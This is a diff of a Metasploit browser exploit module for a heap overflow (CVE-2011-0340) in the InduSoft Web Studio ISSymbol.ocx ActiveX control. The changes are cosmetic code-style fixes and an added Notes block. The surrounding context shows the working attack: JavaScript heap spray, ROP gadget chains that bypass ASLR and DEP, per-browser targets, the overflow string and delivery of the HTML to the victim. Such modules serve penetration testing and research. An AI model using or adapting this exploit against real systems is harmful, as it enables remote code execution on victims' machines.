@@ -8,9 +8,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
-  #include Msf::Exploit::Remote::BrowserAutopwn
+  # include Msf::Exploit::Remote::BrowserAutopwn
   #
-  #autopwn_info({
+  # autopwn_info({
   #  :ua_name    => HttpClients::IE,
   #  :ua_minver  => "6.0",
   #  :ua_maxver  => "9.0",
@@ -19,69 +19,72 @@ class MetasploitModule < Msf::Exploit::Remote
   #  :rank       => NormalRanking,
   #  :classid    => "{3c9dff6f-5cb0-422e-9978-d6405d10718f}",
   #  :method     => "InternationalSeparator"
-  #})
+  # })
 
-
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow",
-      'Description'    => %q{
-        This module exploits a heap overflow found in InduSoft Web Studio <= 61.6.00.00
-        SP6. The overflow exists in the ISSymbol.ocx, and can be triggered with a long
-        string argument for the InternationalSeparator() method of the ISSymbol control.
-        This module uses the msvcr71.dll form the Java JRE6 to bypass ASLR.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow",
+        'Description' => %q{
+          This module exploits a heap overflow found in InduSoft Web Studio <= 61.6.00.00
+          SP6. The overflow exists in the ISSymbol.ocx, and can be triggered with a long
+          string argument for the InternationalSeparator() method of the ISSymbol control.
+          This module uses the msvcr71.dll form the Java JRE6 to bypass ASLR.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Alexander Gavrun', # Vulnerability discovery
           'Dmitriy Pletnev', # Vulnerability discovery
           'James Fitts <fitts.james[at]gmail.com>', # Metasploit module
           'juan vazquez' # Metasploit module
         ],
-      'References'     =>
-        [
+        'References' => [
           [ 'CVE', '2011-0340' ],
           [ 'OSVDB', '72865' ],
           [ 'BID', '47596' ],
           [ 'ZDI', '12-168' ],
           [ 'URL', 'http://web.archive.org/web/20110506063846/http://secunia.com:80/secunia_research/2011-37' ]
         ],
-      'Payload'        =>
-        {
-          'Space'            => 934,
-          'DisableNops'      => true,
-          'PrependEncoder'   => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
+        'Payload' => {
+          'Space' => 934,
+          'DisableNops' => true,
+          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
         },
-      'DefaultOptions'  =>
-        {
+        'DefaultOptions' => {
           'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
+        'Platform' => 'win',
+        'Targets' => [
           [ 'Automatic', {} ],
-          [ 'IE 6 on Windows XP SP3', { 'Rop' => nil,     'Offset' => '0x5F4' } ],
-          [ 'IE 7 on Windows XP SP3', { 'Rop' => nil,     'Offset' => '0x5F4' } ],
+          [ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4' } ],
+          [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4' } ],
           [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4' } ],
-          [ 'IE 7 on Windows Vista',  { 'Rop' => nil,     'Offset' => '0x5f4' } ],
-          [ 'IE 8 on Windows Vista',  { 'Rop' => :jre,    'Offset' => '0x5f4' } ],
-          [ 'IE 8 on Windows 7',      { 'Rop' => :jre,    'Offset' => '0x5f4' } ],
-          [ 'IE 9 on Windows 7',      { 'Rop' => :jre,    'Offset' => '0x5fe' } ]
+          [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4' } ],
+          [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x5f4' } ],
+          [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5f4' } ],
+          [ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5fe' } ]
         ],
-      'Privileged'     => false,
-      'DisclosureDate' => '2012-04-28',
-      'DefaultTarget'  => 0))
+        'Privileged' => false,
+        'DisclosureDate' => '2012-04-28',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )
 
     register_options(
       [
         OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ])
-
+      ]
+    )
   end
 
   def get_target(agent)
-    #If the user is already specified by the user, we'll just use that
+    # If the user is already specified by the user, we'll just use that
     return target if target.name != 'Automatic'
 
     nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
@@ -110,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def ie_heap_spray(my_target, p)
     js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
-    js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
+    js_nops = Rex::Text.to_unescape("\x0c" * 4, Rex::Arch.endian(target.arch))
     js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))
     randnop = rand_text_alpha(rand(100) + 1)
 
@@ -177,7 +180,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     end
 
-    js = heaplib(js, {:noobfu => true})
+    js = heaplib(js, { :noobfu => true })
 
     if datastore['OBFUSCATE']
       js = ::Rex::Exploitation::JSObfu.new(js)
@@ -217,7 +220,7 @@ class MetasploitModule < Msf::Exploit::Remote
         0x77c1f519, # pop # ret from msvcrt.dll
         0x77c4fa1a  # will become eip # mov esp, ebx # pop ebx # ret from msvcrt.dll
       ].pack("V*")
-      rop_payload = generate_rop_payload('msvcrt', code,  {'pivot'=>stack_pivot, 'target'=>'xp'})
+      rop_payload = generate_rop_payload('msvcrt', code, { 'pivot' => stack_pivot, 'target' => 'xp' })
     else
       print_status("Using JRE ROP")
       stack_pivot = [
@@ -229,19 +232,19 @@ class MetasploitModule < Msf::Exploit::Remote
         0x7c376ffe, # pop # ret from msvcr71.dll
         0x7c376ffc  # will become eip # mov esp, ebx # pop ebx # ret from msvcr71.dll
       ].pack("V*")
-      rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
+      rop_payload = generate_rop_payload('java', code, { 'pivot' => stack_pivot })
     end
 
     return rop_payload
   end
 
   def load_exploit_html(my_target, cli)
-    p  = get_payload(my_target, cli)
+    p = get_payload(my_target, cli)
     js = ie_heap_spray(my_target, p)
 
     # ActiveX parameters
     clsid = "3c9dff6f-5cb0-422e-9978-d6405d10718f"
-    name = rand_text_alpha(rand(50) + 1 )
+    name = rand_text_alpha(rand(50) + 1)
     boom = Rex::Text.to_unescape("\x0c" * 6888)
 
     html = %Q|
@@ -265,7 +268,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     agent = request.headers['User-Agent']
-    uri   = request.uri
+    uri = request.uri
     print_status("Requesting: #{uri}")
 
     my_target = get_target(agent)
@@ -279,7 +282,7 @@ class MetasploitModule < Msf::Exploit::Remote
     html = load_exploit_html(my_target, cli)
     html = html.gsub(/^ {4}/, '')
     print_status("Sending HTML...")
-    send_response(cli, html, {'Content-Type'=>'text/html'})
+    send_response(cli, html, { 'Content-Type' => 'text/html' })
   end
 end
 
